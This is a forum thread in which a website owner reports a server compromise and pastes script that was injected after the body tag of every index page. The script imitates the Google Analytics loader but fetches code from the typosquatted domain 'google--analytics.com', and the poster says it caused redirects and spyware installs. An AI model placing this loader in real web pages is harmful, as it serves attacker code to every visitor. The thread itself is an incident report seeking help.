Website hacked

[1337_KR3W]

Every website on my server had its index.html/php edited yesterday.

I'm restoring a backup, deleting all old ftp accounts etc as can't be sure how they got in, but the code below crops up in every document.

At first I thought it was Google analytics and overlooked it, but removing it causes the pages to behave normally again, being a novice could anyone explain for me if this is the problem code, and what it is doing?

Thank you!

<script type="text/javascript">

var _gaq = _gaq || [];
_gaq.push(['_setAccount', 'UA-XXXXX-X']);
_gaq.push(['_trackPageview']);

(function() {
var ga = document.createElement('script'); ga.type = 'text/javascript'; ga.async = true;
ga.src = ('https:' == document.location.protocol ? 'https://ssl' : 'http://www') + '.google--analytics.com/ga.js';
var s = document.getElementsByTagName('script')[0]; s.parentNode.insertBefore(ga, s);
})();

</script>

 

[1337_KR3W]

Run wordpress with shopperpress plugin on 2 sites, the rest are all static pages, seems one of the root ftp accounts was used and edited all index.* sites inserting the code after <body> tags.

Had checked it against the stock analytics code and hadn't noticed the extra dash, very well spotted!

Noticed it was dodgy because all the sites stopped loading, either redirected to bing, or tried to install spyware.